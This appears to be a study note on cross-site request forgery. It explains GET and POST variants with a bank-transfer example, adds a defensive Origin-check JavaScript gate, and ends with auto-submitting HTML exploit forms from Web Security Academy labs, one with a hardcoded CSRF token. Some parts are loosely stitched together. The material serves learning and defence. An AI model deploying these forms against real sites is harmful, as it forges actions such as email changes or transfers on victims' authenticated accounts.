CSRF

Cross Site Request Forgery

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions in a web application in which they are currently authenticated. The browser attaches the victim's session cookie to the forged request automatically, so the application cannot tell it apart from a request the user meant to make.

GET scenario

If the application uses GET requests for state-changing actions such as making bank transfers or sending messages, the whole action may be reduced to a single request like the one below:

// vulnerable request
GET http://application.com/action.do?account=Victim&amount=100 HTTP/1.1

An attacker who notices this constructs the following URL, which transfers $10,000 from the victim's account to the attacker's own:

// attacker-controlled URL
http://application.com/action.do?account=Attacker&amount=10000

The social engineering part of the attack tricks the victim into loading this URL while logged into the banking application. This is usually done with one of the following techniques:

  • sending an unsolicited email with HTML content

  • planting an exploit URL or script on pages the victim is likely to visit while banking online

POST scenario

The only difference between the GET and POST variants is how the forged request is delivered: the victim's browser has to submit a form instead of simply loading a URL. Assume the bank now uses POST and the vulnerable request looks like this:

// vulnerable request
POST http://application.com/action.do HTTP/1.1

account=Victim&amount=10

// auto-submitting form on the attacker's page; the victim's browser sends the POST with its own session cookie
<html>
    <body>
        <form method="POST" action="https://0a21005f04e3e13cc0c7412d00d500d4.web-security-academy.net/my-account/change-email">
            <input type="hidden" name="email" value="wiener7777@normail-user.net">
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>
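Both scenarios above succeed only because the action endpoint accepts whatever the victim's browser sends. The following server-side gate is an added example (not code from the original page or from the lab) showing the two checks a defender would put in front of such an endpoint: refuse to perform the action on GET at all, and on POST require the Origin header (Referer as fallback) to match the application's own origin. The application origin, the request objects and the hostnames are constructed for the demo.

```javascript
// Added example: server-side gate for state-changing actions such as the
// bank transfer on this page. Two independent defences:
//   1. refuse the action on any method other than POST, so a bare URL (the
//      GET scenario) can never trigger it;
//   2. on POST, require Origin (or Referer) to match the application's own
//      origin, so a form auto-submitted from another site (the POST
//      scenario) is rejected before any business logic runs.
// APP_ORIGIN, the request objects and hostnames below are constructed.

const APP_ORIGIN = 'https://application.com'; // assumed application origin

// Return the origin of an absolute URL, or null if it does not parse.
// Browsers send the literal string "null" for opaque origins (sandboxed
// iframes, data: URLs); that string does not parse, so it is rejected too.
function originOf(url) {
  try {
    return new URL(url).origin;
  } catch {
    return null;
  }
}

// Decide whether a request may execute a state-changing action.
// Returns { allowed, reason } so the caller can log why it was blocked.
function checkStateChangingRequest(req, appOrigin = APP_ORIGIN) {
  if (req.method !== 'POST') {
    return { allowed: false, reason: `method ${req.method} not allowed for a state change` };
  }
  // Header names are case-insensitive; normalise before lookup.
  const headers = {};
  for (const [k, v] of Object.entries(req.headers || {})) headers[k.toLowerCase()] = v;

  // Browsers attach Origin to cross-site form POSTs; Referer is the fallback.
  const source = headers.origin != null ? headers.origin : headers.referer;
  if (source == null) {
    return { allowed: false, reason: 'no Origin or Referer header' };
  }
  const srcOrigin = originOf(source);
  if (srcOrigin !== appOrigin) {
    return { allowed: false, reason: `cross-site request from ${srcOrigin}` };
  }
  return { allowed: true, reason: 'same-origin POST' };
}

// Constructed sample requests mirroring the scenarios on the page.
const SAMPLE_REQUESTS = {
  // The GET exploit URL, loaded by the victim's browser from an email.
  getExploit: {
    method: 'GET',
    url: 'http://application.com/action.do?account=Attacker&amount=10000',
    headers: { Host: 'application.com' },
  },
  // The auto-submitting form hosted on the attacker's page.
  crossSitePost: {
    method: 'POST',
    url: 'https://application.com/action.do',
    headers: { Host: 'application.com', Origin: 'https://attacker.example' },
    body: 'account=Attacker&amount=10000',
  },
  // A legitimate transfer submitted from the bank's own page.
  legitimatePost: {
    method: 'POST',
    url: 'https://application.com/action.do',
    headers: { Host: 'application.com', Origin: 'https://application.com' },
    body: 'account=Victim&amount=100',
  },
};

// Run the gate over every sample and return the decisions by name.
function evaluateSamples() {
  const results = {};
  for (const [name, req] of Object.entries(SAMPLE_REQUESTS)) {
    results[name] = checkStateChangingRequest(req);
  }
  return results;
}

for (const [name, r] of Object.entries(evaluateSamples())) {
  console.log(`${name}: ${r.allowed ? 'ALLOW' : 'BLOCK'} (${r.reason})`);
}
```

The Origin check is a second line of defence rather than a replacement for a per-session token: some non-browser clients and privacy proxies strip Referer, which is why a missing header is treated as a block rather than a pass.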

HEAD:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Host: 0a21005f04e3e13cc0c7412d00d500d4.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

/exploit

// make sure to get the latest csrf token
<html>
    <body>
        <form action="https://0abf00800449863bc07f4845000c0092.web-security-academy.net/my-account/change-email" method="POST">
            <input type="hidden" name="email" value="janitor@google.com"/>
            <input type="hidden" name="csrf" value="KfmpZD96CXIjxlnsed0VzUsQGqxpnIzl"/>
            <input type="submit" value="Submit request"/>
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>
